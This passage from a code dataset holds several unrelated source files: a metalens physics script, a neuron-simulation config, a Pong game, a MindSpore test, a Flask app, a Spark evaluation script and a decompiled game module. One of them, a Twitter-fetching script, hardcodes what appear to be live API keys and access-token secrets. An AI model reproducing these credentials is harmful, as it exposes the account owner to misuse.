/ (kk ** 3)\n alpha_m = 1j * pi * 6 * b_n / (kk ** 3)\n\n return alpha_e, alpha_m\n\n\nchi, chi_m = get_alphas(lambda_, r_sph)\n\n\ndef calc_initial_fields(X, Z):\n len_X = len(X)\n len_Z = len(Z)\n electric_initial = np.zeros((len_X, len_Z, 3), dtype=complex)\n magnetic_initial = np.zeros((len_X, len_Z, 3), dtype=complex)\n for i in range(len_X):\n for j in range(len_Z):\n dop = np.exp(1j * np.dot(w, np.array((X[i], 0, Z[j]))))\n electric_initial[i, j] = dop * E_in\n dop_m = np.exp(1j * np.dot(w, np.array((X[i], 0, Z[j])))) / k0\n magnetic_initial[i, j] = dop_m * np.cross(w, E_in)\n return electric_initial, magnetic_initial\n\n\ndef calc_dipoles_fields(particles, X, Z):\n len_X = len(X)\n len_Z = len(Z)\n n = len(particles)\n electric = np.zeros((len_X, len_Z, 3), dtype=complex)\n magnetic = np.zeros((len_X, len_Z, 3), dtype=complex)\n for i in range(len_X):\n for j in range(len_Z):\n e = np.zeros((1, 3), dtype=complex)\n m = np.zeros((1, 3), dtype=complex)\n for t in range(n):\n dipole = particles[t]\n dipole_x = dipole.vector[0]\n dipole_y = dipole.vector[1]\n dipole_z = dipole.vector[2]\n # electric dipoles contribution\n g = green(X[i], dipole_x, 0, dipole_y, Z[j], dipole_z, k1, eps1)\n g_m = -1j * k0 * rot_green(X[i], dipole_x, 0, dipole_y, Z[j], dipole_z, k1)\n m += np.dot(g_m, dipole.electric)\n e += np.dot(g, dipole.electric)\n # magnetic dipoles contribution\n g = 1j * k0 * rot_green(X[i], dipole_x, 0, dipole_y, Z[j], dipole_z, k1)\n g_m = green(X[i], dipole_x, 0, dipole_y, Z[j], dipole_z, k1, eps1)\n e += np.dot(g, dipole.magnetic)\n m += np.dot(g_m, dipole.magnetic)\n electric[i, j] = electric[i, j] + e\n magnetic[i, j] = magnetic[i, j] + m\n return electric, magnetic\n\n\ndef calc_intensities(X, Z, electric, magnetic):\n len_X = len(X)\n len_Z = len(Z)\n intensity_e = np.zeros((len_X, len_Z))\n intensity_m = np.zeros((len_X, len_Z))\n for i in range(len_X):\n for j in range(len_Z):\n for t in range(3):\n intensity_e[i, j] += np.abs(electric[i, j, t]) ** 2\n intensity_m[i, j] += np.abs(magnetic[i, j, t]) ** 2\n return intensity_e, intensity_m\n\n\ndef calc(ring_subject: Metalens, X, Y, Z, get_intensity=False):\n len_X = len(X)\n len_Z = len(Z)\n dipoles = [Dipole(x, E_in * chi, H_in * chi_m) for x in get_points(ring_subject)]\n electric, magnetic = calc_initial_fields(X, Z)\n electric_d, magnetic_d = calc_dipoles_fields(dipoles, X, Z)\n electric += electric_d\n magnetic += magnetic_d\n intensity_e = np.zeros((len_X, len_Z))\n intensity_m = np.zeros((len_X, len_Z))\n for i in range(len_X):\n for j in range(len_Z):\n for t in range(3):\n intensity_e[i, j] += np.abs(electric[i, j, t]) ** 2\n intensity_m[i, j] += np.abs(magnetic[i, j, t]) ** 2\n intensity = intensity_e + intensity_m\n m = np.transpose(intensity)\n m_e = np.transpose(intensity_e)\n m_m = np.transpose(intensity_m)\n max_z, max_x = np.unravel_index(m.argmax(), m.shape)\n max_z_e, max_x_e = np.unravel_index(m_e.argmax(), m_e.shape)\n max_z_m, max_x_m = np.unravel_index(m_m.argmax(), m_m.shape)\n if get_intensity:\n return intensity_e, intensity_m, intensity\n else:\n return \\\n (X[max_x_e], Z[max_z_e], intensity_e) \\\n , (X[max_x_m], Z[max_z_m], intensity_m) \\\n , (X[max_x], Z[max_z], intensity)\n","sub_path":"physics.py","file_name":"physics.py","file_ext":"py","file_size_in_byte":5427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"576597693","text":"\"\"\" cfg.py \"\"\"\nfrom netpyne import specs\nfrom netpyne.specs import Dict, ODict\n\ncfg = 
specs.SimConfig() \n\n# Parameters\n#cfg.gna17 = 0.0057\n#cfg.gna18 = 0.013\n\n#cfg.gna17 = 0.01066\n#cfg.gna18 = 0.02427\ncfg.hParams = {'celsius': 37, 'v_init': -50}\ncfg.vrest = cfg.hParams['v_init']\n\n#cfg.gna17 = 0.01\n#cfg.gna18 = 0.03\n#cfg.cndct = [ 1.5 , 0.5 ]\n\n#length of the peripheral axon\ncfg.L = 1000#100000\ncfg.nseg = 101\n#testing dlambda\n\ncfg.gna17 = 0.8 * 0.3\ncfg.gna18 = 0.9 * 0.3 \ncfg.gna19 = 0.06 * 0.5\ncfg.nacndct = [ 1 , 1 , 1 ]\n\ncfg.gk2 = 0.06 # KDR channel\ncfg.gk3 = 0.06 # A-type channel\n\ncfg.gk7 = 0.01 # IM channel 0.02 is the value for XE9 blockade.\n\ncfg.kcndct = [ 0, 1 , 1 , 0, 1]\n\ncfg.navq = { 'nav17': 1.0, 'nav18': 1, 'na19a': 5}\ncfg.kvq = { 'kv2': 1.5 , 'kv3': 3.0 }\n\ncfg.gca = 0\n\n#55.805\n#ena, ek for testing values... maybe? 140/10\n# 66.7 , -81.31\ncfg.ena = 60 #5.8#66.7\ncfg.ek = -70#-81.31\ncfg.rmut = 0.0\n\ncfg.gm = 0.0001\ncfg.delay = [0, 300]#, 250, 300] #, 400, 500, 600 ] #, 200, 300, 400, 500 ]#, 100, 200, 300, 400, 500]#s, 200, 300, 400, 500, 600, 700, 800, 900 ]\n\ncfg.cvode_active = True\n#cfg.dt = 0.01\n#cfg.hParams = {'celsius': 37, 'v_init': -50}\n\ncfg.recordStims = False \ncfg.recordStep = 0.0125\n\ncfg.nav17 = 'nav17'\ncfg.nav18 = 'nav18'\ncfg.nav19 = 'na19a'\n\n#generate recordTraces for the peripheral axon, note that will be in centimeters\nfor x in [ 0.1, 0.3, 0.5, 0.7, 0.9]:\n cfg.recordTraces['v(%.2fcm)' %(x * cfg.L / 10000)] = {'sec': 'axnperi', 'loc': x, 'var': 'v'}\n\n#generate recordTraces for the soma\nfor i, chan in [ ['ina7','nav17'], ['ina8','nav18'], ['ina9','na19a'] ]:\n cfg.recordTraces[i] = {'sec': 'drgsoma', 'loc': 0.5, 'var': 'ina_%s' %(chan)}\n\nfor i, chan in [ ['ikdr','kv2'], ['ika','kv3'], ['ikm','kv7'] ]:\n cfg.recordTraces[i] = {'sec': 'drgsoma', 'loc': 0.5, 'var': 'ik_%s' %(chan)}\n\ncfg.recordTraces['vs'] = {'sec': 'drgsoma', 'loc': 0.5, 'var': 'v'}\ncfg.recordTraces['vc'] = {'sec': 'axncntr', 'loc': 0.5, 'var': 'v'}\n\n# Saving\ncfg.simLabel = 'sim1'\ncfg.saveFolder = 'data'\ncfg.savePickle = False\ncfg.saveJson = True\ncfg.saveDataInclude = ['simData', 'simConfig']\n\n\n# Analysis and plotting \n#cfg.analysis.plotTraces = {'include': ['cnrn'], 'overlay': True, 'oneFigPer': 'cell', 'saveFig': True,#'plots/n7_%.1f_n9_%.3f_k2_%.3f_k3_%.3f.png' %(cfg.nacndct[0], cfg.gna19, cfg.gk2, cfg.gk3), \n# 'showFig': False, 'timeRange': [cfg.delay[0], cfg.duration]}\n\ncfg.duration = cfg.delay[-1] + 25\ncfg.analysis.plotTraces = {'include': ['cnrn'], 'overlay': True, 'oneFigPer': 'cell', 'saveFig': True,#'plots/n7_%.1f_n9_%.3f_k2_%.3f_k3_%.3f.png' %(cfg.nacndct[0], cfg.gna19, cfg.gk2, cfg.gk3), \n 'showFig': False, 'timeRange': [cfg.delay[1] - 5, cfg.duration]}\n","sub_path":"cfg.py","file_name":"cfg.py","file_ext":"py","file_size_in_byte":2774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"115666413","text":"import sys\nimport os\nimport pygame\nimport pygame_gui\n\nBLACK = (0, 0, 0)\nGRAY = (200, 203, 200)\n\nscore = 0\nscore2 = 0\n\npygame.init()\npygame.display.set_caption('Pong')\nsize = width, height = 800, 600\nscreen = pygame.display.set_mode(size)\nfps = 60\n\n\ndef terminate():\n pygame.quit()\n sys.exit()\n\n\ndef load_image(name, colorkey=None): # загрузка изображения\n fullname = os.path.join('data', name)\n if not os.path.isfile(fullname):\n print(f\"Файл с изображением '{name}' не найден\")\n sys.exit()\n image = pygame.image.load(fullname)\n if colorkey is not None:\n image = image.convert()\n if colorkey == -1:\n colorkey = 
image.get_at((0, 0))\n image.set_colorkey(colorkey)\n else:\n image = image.convert_alpha()\n return image\n\n\ndef start_screen(): # начальное меню\n \"\"\"\n Начальная заставка с кнопками\n \"\"\"\n global score\n global score2\n manager = pygame_gui.UIManager((800, 600), os.path.join('data', 'menu_theme.json'))\n # Кнопки\n start_btn = pygame_gui.elements.UIButton(\n relative_rect=pygame.Rect((800 // 2 - 75, 600 // 3 - 25), (150, 50)),\n text='Начать игру',\n manager=manager\n )\n exit_btn = pygame_gui.elements.UIButton(\n relative_rect=pygame.Rect((800 // 2 - 75, 600 // 2 + 125), (150, 50)),\n text='Выход',\n manager=manager\n )\n back = load_image('fon.jpg')\n screen.blit(back, (0, 0))\n while True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n terminate()\n if event.type == pygame.USEREVENT:\n if event.user_type == pygame_gui.UI_BUTTON_PRESSED:\n if event.ui_element == start_btn:\n score = 0\n score2 = 0\n game()\n if event.ui_element == exit_btn:\n terminate()\n manager.process_events(event)\n manager.update(fps / 1000)\n manager.draw_ui(screen)\n pygame.display.flip()\n clock.tick(fps)\n\n\ndef finish_screen(): # экран победы для первого игрока\n intro_text = [\"Это\",\n \"Было\",\n \"Слишком лекго\",\n \"Игрок номер один, ты слишком силен\",\n \"Нажмите пробел чтобы вернуться в меню\"]\n\n fon = pygame.transform.scale(load_image('fon.jpg'), (800, 600))\n screen.blit(fon, (0, 0))\n font = pygame.font.Font(None, 30)\n text_coord = 50\n for line in intro_text:\n string_rendered = font.render(line, 1, pygame.Color('gray'))\n intro_rect = string_rendered.get_rect()\n text_coord += 10\n intro_rect.top = text_coord\n intro_rect.x = 10\n text_coord += intro_rect.height\n screen.blit(string_rendered, intro_rect)\n\n while True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n terminate()\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE:\n start_screen()\n pygame.display.flip()\n clock.tick(fps)\n\n\ndef finish_screen2(): # экран победы для второго игрока\n intro_text = [\"Вау\",\n \"Как ты смог \",\n \"Победить\",\n \"Игрок номер два?\",\n \"Нажмите пробел чтобы вернуться в меню\"]\n\n fon = pygame.transform.scale(load_image('fon.jpg'), (800, 600))\n screen.blit(fon, (0, 0))\n font = pygame.font.Font(None, 30)\n text_coord = 50\n for line in intro_text:\n string_rendered = font.render(line, 1, pygame.Color('gray'))\n intro_rect = string_rendered.get_rect()\n text_coord += 10\n intro_rect.top = text_coord\n intro_rect.x = 10\n text_coord += intro_rect.height\n screen.blit(string_rendered, intro_rect)\n\n while True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n terminate()\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE:\n start_screen()\n pygame.display.flip()\n clock.tick(fps)\n\n\nclass Ball(pygame.sprite.Sprite): # собственно шар\n def __init__(self, radius, x, y):\n super().__init__(all_sprites)\n self.radius = radius\n self.image = pygame.Surface((2 * radius, 2 * radius),\n pygame.SRCALPHA, 32)\n pygame.draw.circle(self.image, pygame.Color(\"white\"),\n (radius, radius), radius)\n self.rect = pygame.Rect(x, y, 2 * radius, 2 * radius)\n self.vx = 4\n self.vy = 5\n self.boom = pygame.mixer.Sound(os.path.join('data', 'ponk.wav')) # звук столкновения\n\n def update(self):\n self.rect = self.rect.move(self.vx, self.vy)\n if pygame.sprite.spritecollideany(self, horizontal_borders):\n self.vy = -self.vy\n self.boom.play()\n if pygame.sprite.spritecollideany(self, vertical_borders):\n 
self.vx = -self.vx\n self.boom.play()\n\n\nclass Border(pygame.sprite.Sprite):\n # строго вертикальный или строго горизонтальный отрезок\n def __init__(self, x1, y1, x2, y2):\n super().__init__(all_sprites)\n if x1 == x2: # вертикальная стенка\n self.add(vertical_borders)\n self.image = pygame.Surface([6, y2 - y1])\n self.image.fill([255, 255, 255])\n self.rect = pygame.Rect(x1, y1, 1, y2 - y1)\n else: # горизонтальная стенка\n self.add(horizontal_borders)\n self.image = pygame.Surface([x2 - x1, 6])\n self.image.fill([255, 255, 255])\n self.rect = pygame.Rect(x1, y1, x2 - x1, 1)\n\n\nclass Pl(pygame.sprite.Sprite): # игрок номер один\n def __init__(self, x1, y1, x2, y2):\n super().__init__(all_sprites)\n self.add(vertical_borders)\n self.image = pygame.Surface([x2 - x1, y2 - y1])\n self.image.fill([255, 255, 255])\n self.rect = pygame.Rect(x1, y1, x2 - x1, y2 - y1)\n\n\nclass Pl2(pygame.sprite.Sprite): # игрок номер два\n def __init__(self, x1, y1, x2, y2):\n super().__init__(all_sprites)\n self.add(vertical_borders)\n self.image = pygame.Surface([x2 - x1, y2 - y1])\n self.image.fill([255, 255, 255])\n self.rect = pygame.Rect(x1, y1, x2 - x1, y2 - y1)\n\n\ndef draw(): # рисование теннисной сетки\n pygame.draw.line(screen, GRAY, (400, 0), (400, 600), 5)\n\n\ndef game():\n global score\n global score2\n goal = pygame.mixer.Sound(os.path.join('data', 'prob.wav')) # звук забивания гола\n Border(0, 100, 800, 100)\n Border(5, height - 5, width - 5, height - 5)\n player = Pl(0, 200, 20, 350)\n player2 = Pl2(780, 200, 800, 350)\n ball = Ball(12, 400, 300)\n for i in range(1):\n ball\n running = True\n while running:\n if ball.rect.x >= 800:\n ball.rect.x = 400\n ball.rect.y = 300\n score += 1\n goal.play()\n if score == 3:\n player.kill()\n player2.kill()\n ball.kill()\n finish_screen()\n elif ball.rect.x <= 0:\n ball.rect.x = 400\n ball.rect.y = 300\n score2 += 1\n goal.play()\n if score2 == 3:\n player.kill()\n player2.kill()\n ball.kill()\n finish_screen2()\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n terminate()\n if pygame.key.get_pressed()[pygame.K_w]:\n player.rect.y -= 7\n if player.rect.y < 99:\n player.rect.y = 100\n if pygame.key.get_pressed()[pygame.K_s]:\n player.rect.y += 7\n if player.rect.y > 455:\n player.rect.y = 455\n if pygame.key.get_pressed()[pygame.K_UP]:\n player2.rect.y -= 7\n if player2.rect.y < 99:\n player2.rect.y = 100\n if pygame.key.get_pressed()[pygame.K_DOWN]:\n player2.rect.y += 7\n if player2.rect.y > 455:\n player2.rect.y = 455\n draw()\n screen.fill((0, 0, 0))\n all_sprites.draw(screen)\n all_sprites.update()\n font = pygame.font.Font(None, 85)\n text = font.render(str(score), 1, (255, 255, 255))\n screen.blit(text, (200, 25))\n text = font.render(str(score2), 1, (255, 255, 255))\n screen.blit(text, (600, 25))\n clock.tick(fps)\n draw()\n pygame.display.flip()\n\n\nclock = pygame.time.Clock()\nall_sprites = pygame.sprite.Group()\nhorizontal_borders = pygame.sprite.Group()\nvertical_borders = pygame.sprite.Group()\nstart_screen()\npygame.quit()\n","sub_path":"Pong.py","file_name":"Pong.py","file_ext":"py","file_size_in_byte":9283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"609883571","text":"# Copyright 2019 Huawei Technologies Co., Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# 
http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============================================================================\n\nfrom mindspore.ops import Primitive\nfrom mindspore.ops import operations as P\n\nmake_tuple = Primitive('make_tuple')\ntuple_getitem = Primitive('tuple_getitem')\nconv = P.Conv2D(out_channel=64, kernel_size=7, mode=1, pad_mode=\"valid\", pad=0, stride=1, dilation=1, group=1)\nbn = P.FusedBatchNorm()\nrelu = P.ReLU()\nconv_bn1 = Primitive('ConvBN1')\nbn2_relu = Primitive('BN2Relu')\n\n\nclass FnDict:\n def __init__(self):\n self.fnDict = {}\n\n def __call__(self, fn):\n self.fnDict[fn.__name__] = fn\n\n def __getitem__(self, name):\n return self.fnDict[name]\n\n\ndef test_conv_bn_relu_fusion(tag):\n \"\"\" test_conv_bn_relu_fusion \"\"\"\n fns = FnDict()\n\n @fns\n def before(x, w, scale, b, mean, variance):\n conv_output = conv(x, w)\n bn_output = bn(conv_output, scale, b, mean, variance)\n item0 = tuple_getitem(bn_output, 0)\n item1 = tuple_getitem(bn_output, 3)\n item2 = tuple_getitem(bn_output, 4)\n output = make_tuple(relu(item0), item1, item2)\n res = tuple_getitem(output, 0)\n return res\n\n @fns\n def after(x, w, scale, b, mean, variance):\n conv_bn1_output = conv_bn1(x, w)\n conv_item0 = tuple_getitem(conv_bn1_output, 0)\n conv_item1 = tuple_getitem(conv_bn1_output, 1)\n conv_item2 = tuple_getitem(conv_bn1_output, 2)\n bn2_relu_output = bn2_relu(conv_item0, conv_item1, conv_item2, scale, b, mean, variance)\n bn2_relu_item0 = tuple_getitem(bn2_relu_output, 0)\n bn2_relu_item1 = tuple_getitem(bn2_relu_output, 1)\n bn2_relu_item2 = tuple_getitem(bn2_relu_output, 2)\n bn2_relu_item3 = tuple_getitem(bn2_relu_output, 3)\n new_make_tuple = make_tuple(bn2_relu_item0, bn2_relu_item1, bn2_relu_item2, conv_item2, bn2_relu_item3)\n item1 = tuple_getitem(new_make_tuple, 3)\n item2 = tuple_getitem(new_make_tuple, 4)\n output = make_tuple(bn2_relu_item0, item1, item2)\n return make_tuple(tuple_getitem(output, 0))\n\n return fns[tag]\n","sub_path":"tests/ut/cpp/python_input/gtest_input/pre_activate/conv_bn_relu_fusion.py","file_name":"conv_bn_relu_fusion.py","file_ext":"py","file_size_in_byte":2669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"9680895","text":"\"\"\"Import of all required libraries\"\"\"\nimport time\nimport string\nimport re\nimport tweepy\nfrom tweepy.parsers import JSONParser\nfrom tqdm import *\nfrom colorama import Fore\nfrom tabulate import tabulate\n\n\ndef get_tweets(user_name, counter):\n \"\"\"Function that gets tweets from Twitter API and returns of tweets for a user input.\"\"\"\n\n consumer_key = 'h9TsXsqm4F7ctc9buiUsiWnN4'\n consumer_secret_key = '5dh9YGaFsXHxYLcpyhPbsA5FtQH1Jxgr2nQOXZXV3gfVrG3GlK'\n access_token = '708686394-5pzbHEvfV8yNyXdwv9hK94hEEmkdPKlb4MPhkG20'\n access_token_secret = 'Jv2YaAdxWrtucDfYwzhcRaZqqynsjWVgG7UTyUcRV1TAk'\n try:\n\n authenticator = tweepy.OAuthHandler(consumer_key, consumer_secret_key)\n authenticator.set_access_token(access_token, access_token_secret)\n api = tweepy.API(authenticator, parser=tweepy.parsers.JSONParser())\n print(Fore.CYAN + \"Waiting for Twitter to respond...\")\n tweet_info = 
api.user_timeline(screen_name=user_name, count=counter)\n        user_tweets = []\n        tweet_dates = []\n        print(Fore.CYAN + \"Populating {}'s list of tweets...\\n\".format(user_name))\n        punctuation = list(string.punctuation)\n        header = ['Date', 'Tweet']\n        for tweet in tqdm(tweet_info):\n            if tweet not in punctuation:\n                user_tweets.append(re.sub('[^\\x00-\\x7F]+', \"\", tweet['text']))\n                tweet_dates.append(tweet['created_at'])\n            time.sleep(0.03)\n        tweet_dic = dict(zip(user_tweets, tweet_dates))\n        table = sorted([(v[:11], k) for k, v in tweet_dic.items()])\n        print(tabulate(table, headers=header, tablefmt='fancy_grid', stralign=\"left\")+'\\n')\n        return user_tweets\n    except tweepy.TweepError:\n        print(\"That's not a real Twitter handle boss. Try again!\\n\")\n","sub_path":"Get_Twitter_Posts.py","file_name":"Get_Twitter_Posts.py","file_ext":"py","file_size_in_byte":1802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"458758168","text":"from flask import Flask\r\n\r\napp = Flask(__name__)\r\napp.config['DEBUG'] = True\r\n\r\n@app.route(\"/\")\r\ndef index():\r\n    return \"<h1>Hello World!!</h1>\"\r\n\r\n\r\n#@app.route(\"/david\")\r\n#def david():\r\n#    return \"<h1>Hello David!!</h1>\"\r\n\r\n\r\n@app.route(\"/<name>\")\r\ndef hello(name):\r\n    name = name.capitalize()\r\n    return f\"<h1>Hello, {name}</h1>
\"\r\n\r\n\r\n#''' env FLASK_APP=flask_application.py flask run '''\r\n","sub_path":"flask_application.py","file_name":"flask_application.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"161138488","text":"#!/usr/bin/python\n\nimport pandas as pd\nimport json\nfrom uuid import uuid4\nimport time, sys, os, shutil, glob, io, requests\nfrom pyspark.sql import SparkSession\nfrom pyspark.ml import Pipeline, Model, PipelineModel\nfrom pyspark.sql import SQLContext\nimport dsx_core_utils\nfrom dsx_ml.ml import save_evaluation_metrics\n\n\n# setup dsxr environmental vars from command line input\nfrom dsx_ml.ml import dsxr_setup_environment\ndsxr_setup_environment()\n\n# define variables\nargs = {\"dataset\": \"/datasets/TradingCustomerSparkMLEval.csv\", \"published\": \"false\", \"threshold\": {\"metric\": \"f1Score\", \"min_value\": 0.7, \"mid_value\": 0.87}, \"evaluator_type\": \"multiclass\", \"execution_type\": \"DSX\", \"remoteHost\": \"\", \"remoteHostImage\": \"\", \"livyVersion\": \"livyspark2\"}\nmodel_path = os.path.join(os.getenv(\"DSX_PROJECT_DIR\"), \"models\", os.getenv(\"DEF_DSX_MODEL_NAME\", \"TradingChurnRiskClassificationSparkML\"), os.getenv(\"DEF_DSX_MODEL_VERSION\", \"1\"), \"model\")\n\n# create spark context\nspark = SparkSession.builder.getOrCreate()\nsc = spark.sparkContext\n\n# load the input data\n\ninput_data = os.getenv(\"DEF_DSX_DATASOURCE_INPUT_FILE\", os.getenv(\"DSX_PROJECT_DIR\") + args.get(\"dataset\"))\ndataframe = SQLContext(sc).read.csv(input_data , header=\"true\", inferSchema = \"true\")\n\n# load the model from disk \nmodel_rf = PipelineModel.load(model_path)\n\n\nstartTime = int(time.time())\n\n# generate predictions\npredictions = model_rf.transform(dataframe)\n\nthreshold = {'metric': 'f1Score', 'min_value': 0.7, 'mid_value': 0.87}\n\n# replace \"label\" below with the numeric representation of\n# the label column that you defined while training the model\nlabelCol = \"label\"\n\n# create evaluator\nfrom pyspark.ml.evaluation import MulticlassClassificationEvaluator\nevaluator = MulticlassClassificationEvaluator(labelCol=labelCol)\n\n# compute evaluations\neval_fields = {\n \"accuracyScore\": evaluator.evaluate(predictions, {evaluator.metricName: \"accuracy\"}),\n \"f1Score\": evaluator.evaluate(predictions, {evaluator.metricName: \"f1\"}),\n \"weightedPrecisionScore\": evaluator.evaluate(predictions, {evaluator.metricName: \"weightedPrecision\"}),\n \"weightedRecallScore\": evaluator.evaluate(predictions, {evaluator.metricName: \"weightedRecall\"}),\n \"thresholdMetric\": threshold[\"metric\"],\n \"thresholdMinValue\": threshold[\"min_value\"],\n \"thresholdMidValue\": threshold[\"mid_value\"]\n }\n\n# feel free to customize to your own performance logic using the values of \"good\", \"poor\", and \"fair\".\nif(eval_fields[eval_fields[\"thresholdMetric\"]] >= threshold.get('mid_value', 0.70)):\n eval_fields[\"performance\"] = \"good\"\nelif(eval_fields[eval_fields[\"thresholdMetric\"]] <= threshold.get('min_value', 0.25)):\n eval_fields[\"performance\"] = \"poor\"\nelse:\n eval_fields[\"performance\"] = \"fair\"\n\nsave_evaluation_metrics(eval_fields, \"TradingChurnRiskClassificationSparkML\", \"1\", 
startTime)","sub_path":"scripts/TradingChurnRiskClassificationSparkML-model-evaluation-1566217586425.py","file_name":"TradingChurnRiskClassificationSparkML-model-evaluation-1566217586425.py","file_ext":"py","file_size_in_byte":2873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"578219643","text":"# Python bytecode 2.7 (decompiled from Python 2.7)\r\n# Embedded file name: scripts/client/vehicle_systems/vehicle_assembler.py\r\nfrom CustomEffectManager import CustomEffectManager\r\nfrom VehicleEffects import VehicleExhaustEffects, VehicleTrailEffects\r\nfrom vehicle_systems.CompoundAppearance import CompoundAppearance\r\nfrom vehicle_systems.components.world_connectors import GunRotatorConnector\r\nfrom vehicle_systems.model_assembler import prepareCompoundAssembler\r\nimport functools\r\nfrom constants import VEHICLE_PHYSICS_MODE\r\nfrom vehicle_systems.components.vehicle_audition_wwise import EngineAuditionWWISE, TrackCrashAuditionWWISE\r\nimport weakref\r\nimport BigWorld\r\nimport WoT\r\nfrom vehicle_systems.components.engine_state import DetailedEngineStateWWISE\r\nfrom vehicle_systems.components.highlighter import Highlighter\r\nfrom helpers import gEffectsDisabled\r\n\r\ndef createAssembler(vehicle):\r\n return PanzerAssemblerWWISE(vehicle)\r\n\r\n\r\nclass VehicleAssemblerAbstract(object):\r\n appearance = property()\r\n\r\n def __init__(self):\r\n pass\r\n\r\n def prerequisites(self):\r\n return None\r\n\r\n def constructAppearance(self, prereqs):\r\n return None\r\n\r\n\r\nclass _CompoundAssembler(VehicleAssemblerAbstract):\r\n appearance = property(lambda self: self.__appearance)\r\n\r\n def __init__(self, vehicle):\r\n VehicleAssemblerAbstract.__init__(self)\r\n self.__appearance = CompoundAppearance()\r\n self.__vehicleRef = weakref.ref(vehicle)\r\n\r\n def prerequisites(self):\r\n vehicle = self.__vehicleRef()\r\n prereqs = self.__appearance.prerequisites(vehicle)\r\n compoundAssembler = prepareCompoundAssembler(vehicle.typeDescriptor, self.__appearance.damageState.modelState, BigWorld.player().spaceID, vehicle.isTurretDetached)\r\n return prereqs + [compoundAssembler]\r\n\r\n def _assembleParts(self, vehicle, appearance):\r\n pass\r\n\r\n def constructAppearance(self, prereqs):\r\n self._assembleParts(self.__vehicleRef(), self.__appearance)\r\n return self.__appearance\r\n\r\n\r\nclass PanzerAssemblerWWISE(_CompoundAssembler):\r\n\r\n @staticmethod\r\n def __assembleEngineState(vehicle):\r\n detailedEngineState = DetailedEngineStateWWISE()\r\n isPlayerVehicle = vehicle.isPlayerVehicle\r\n if isPlayerVehicle:\r\n detailedEngineState.physicRPMLink = lambda : WoT.unpackAuxVehiclePhysicsData(BigWorld.player().ownVehicleAuxPhysicsData)[5]\r\n detailedEngineState.physicGearLink = lambda : BigWorld.player().ownVehicleGear\r\n else:\r\n detailedEngineState.physicRPMLink = lambda : 0.0\r\n detailedEngineState.physicGearLink = lambda : 0\r\n return detailedEngineState\r\n\r\n @staticmethod\r\n def __assembleEngineAudition(vehicle, appearance):\r\n vehicle = weakref.proxy(vehicle)\r\n appearance = weakref.proxy(appearance)\r\n engineAudition = EngineAuditionWWISE(vehicle.physicsMode, vehicle.isPlayerVehicle, appearance.compoundModel, vehicle.typeDescriptor, vehicle.id)\r\n e = engineAudition\r\n e.isUnderwaterLink = lambda : appearance.isUnderwater\r\n e.isInWaterLink = lambda : appearance.isInWater\r\n e.isFlyingLink = functools.partial(PanzerAssemblerWWISE.__isFlying, vehicle, appearance)\r\n e.curTerrainMatKindLink = lambda : 
appearance.terrainMatKind\r\n e.leftTrackScrollLink = lambda : appearance.leftTrackScroll\r\n e.leftTrackScrollRelativeLink = lambda : appearance.customEffectManager.getParameter('deltaL')\r\n e.rightTrackScrollLink = lambda : appearance.rightTrackScroll\r\n e.rightTrackScrollRelativeLink = lambda : appearance.customEffectManager.getParameter('deltaR')\r\n e.detailedEngineState = appearance.detailedEngineState\r\n e.vehicleFilter = vehicle.filter\r\n return e\r\n\r\n @staticmethod\r\n def __isFlying(vehicle, appearance):\r\n filter = vehicle.filter\r\n if filter.placingOnGround:\r\n contactsWithGround = filter.numLeftTrackContacts + filter.numRightTrackContacts\r\n return contactsWithGround == 0\r\n else:\r\n return appearance.fashion.isFlying\r\n\r\n @staticmethod\r\n def __createTrackCrashControl(vehicle, appearance):\r\n if vehicle.physicsMode == VEHICLE_PHYSICS_MODE.DETAILED:\r\n if vehicle.isAlive() and appearance.customEffectManager is not None:\r\n trackCenterNodes = tuple((appearance.customEffectManager.getTrackCenterNode(x) for x in xrange(2)))\r\n appearance.trackCrashAudition = TrackCrashAuditionWWISE(trackCenterNodes)\r\n else:\r\n trackCenterNodes = tuple((appearance.trailEffects.getTrackCenterNode(x) for x in xrange(2)))\r\n appearance.trackCrashAudition = TrackCrashAuditionWWISE(trackCenterNodes)\r\n return\r\n\r\n def _assembleParts(self, vehicle, appearance):\r\n appearance.detailedEngineState = self.__assembleEngineState(vehicle)\r\n _createEffects(vehicle, appearance)\r\n if vehicle.isAlive():\r\n if not appearance.isPillbox and not gEffectsDisabled():\r\n appearance.engineAudition = self.__assembleEngineAudition(vehicle, appearance)\r\n appearance.detailedEngineState.onEngineStart += appearance.engineAudition.onEngineStart\r\n if vehicle.isPlayerVehicle:\r\n gunRotatorConnector = GunRotatorConnector(appearance.compoundModel)\r\n appearance.addComponent(gunRotatorConnector)\r\n self.__createTrackCrashControl(vehicle, appearance)\r\n appearance.highlighter = Highlighter(vehicle)\r\n\r\n\r\ndef _createEffects(vehicle, appearance):\r\n if not vehicle.isAlive():\r\n return\r\n elif gEffectsDisabled():\r\n appearance.customEffectManager = None\r\n return\r\n else:\r\n if vehicle.physicsMode == VEHICLE_PHYSICS_MODE.DETAILED:\r\n appearance.customEffectManager = CustomEffectManager(vehicle, appearance.detailedEngineState)\r\n else:\r\n appearance.exhaustEffects = VehicleExhaustEffects(vehicle.typeDescriptor)\r\n appearance.trailEffects = 